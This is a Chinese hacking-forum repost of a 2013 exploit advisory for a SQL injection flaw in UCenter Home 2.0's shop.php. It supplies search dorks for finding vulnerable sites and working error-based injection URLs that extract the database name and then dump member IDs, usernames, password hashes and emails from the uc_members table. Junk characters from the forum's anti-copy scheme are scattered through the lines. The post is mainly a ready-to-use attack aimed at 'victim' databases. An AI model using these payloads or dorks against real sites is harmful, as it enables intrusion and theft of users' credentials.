找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2055|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
6 c- G, Z' \3 T( S' \( k0 t
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
1 x' A- R# a7 d1 S* G3 Z: d* Q( P9 {* a: r) A% n! l
                                 
$ m+ T: e" S  g* |4 t. |8 {, r8 V8 d* U* L
*/ Author : KnocKout  ' D* q  v, }! K/ |1 w0 {) s( `

+ c, ?3 V6 \+ X& P: a*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
' E, a# C4 c' X
& k2 t9 C" g" F' y9 ~*/ Contact: knockoutr@msn.com  
5 ?" z7 i1 M+ c- X" F4 C) l  ~5 p+ L! j& ~# [2 K/ l* p+ P
*/ Cyber-Warrior.org/CWKnocKout  % y8 M1 _7 v% m4 ]# d9 P$ r

1 n* j! Q3 k/ Y2 ]& \, z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  $ L! a) H' Z/ I' @

! x0 t* B: W" R% MScript : UCenter Home  
% I  x+ s7 B& r; ^0 m# c7 I: I! o, ~# S6 h
Version : 2.0  ! X+ b7 h, A2 W  y" {
* h3 U* l% `* ^  p" i
Script HomePage : http://u.discuz.net/  1 {7 y8 t. Y$ I1 W/ q) |( `6 a
$ F/ m9 c6 ?5 U% g) A9 K8 o4 t; O
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  # z! V: r0 X3 @9 d7 H) @4 O
8 O: H/ ^8 E" W
Dork : Powered by UCenter inurl:shop.php?ac=view  
6 w5 V: V6 I7 u% c" b) N: f. W9 ?4 S) i. J1 V$ g0 j! e- ^
Dork 2 : inurl:shop.php?ac=view&shopid=  
' Y8 }, J' ~+ N3 G/ ^$ M0 O. d; o
5 }* q( |4 @6 Z/ `/ `__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
  y$ ^. {" N5 E+ Z. ?/ ]! M  A3 f9 d
Vuln file : Shop.php  + `7 p8 p) ~5 t

9 t" x% [& M* }  T+ |0 g. U$ I5 _value's : (?)ac=view&shopid=  
' e6 y* x# U7 y; |4 v1 [
3 J( G: R9 H4 [- ~Vulnerable Style : SQL Injection (MySQL Error Based)  4 D- |; x( v. {9 Q# [' R0 G  F

/ x. o( j! x! K. d  M' W0 lNeed Metarials : Hex Conversion  8 \, h. B5 M+ ?( m6 O

4 k7 U' d, ^- X. u0 h/ \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
& _5 Z1 I1 R' \6 z, `+ v8 s/ ~6 ?9 y* }
Your Need victim Database name.   
' |0 T0 x7 f8 n' X) a* U
$ P5 _6 u+ E0 C8 d; z! cfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  0 [' [7 G- d" w, i+ p* H: k. q
  e. [' X0 r. F: |! S6 z: I. _
..  + X+ Y/ ^7 _( P/ J! l1 u# e/ Y

( ^0 P4 E' T" F. E8 ?- dDB : Okey.  8 Y2 ?9 o! @/ I+ O. o- M
, D3 K" w4 Y  F, I% a
your edit DB `[TARGET DB NAME]`  0 A0 N# J" m( g+ `

5 q3 r6 n5 y9 x$ q1 W5 M' X4 z' {Example : 'hiwir1_ucenter'  ! I  t; x- }& z" u0 \: a& `

% Q, P) B, r9 \5 p, }Edit : Okey.  8 u# \/ b9 ?# [, |1 {$ z
2 }3 c. O) z/ Y1 B
Your use Hex conversion. And edit Your SQL Injection Exploit..  
' H/ x5 l7 k0 d' {; {; D9 U: v: D/ r. b
   
4 {" {; l8 Y, h, H1 Y! g5 N. x' r# s3 T
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  0 {9 B* P" n: d; q5 s, ~1 Y0 d8 M0 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表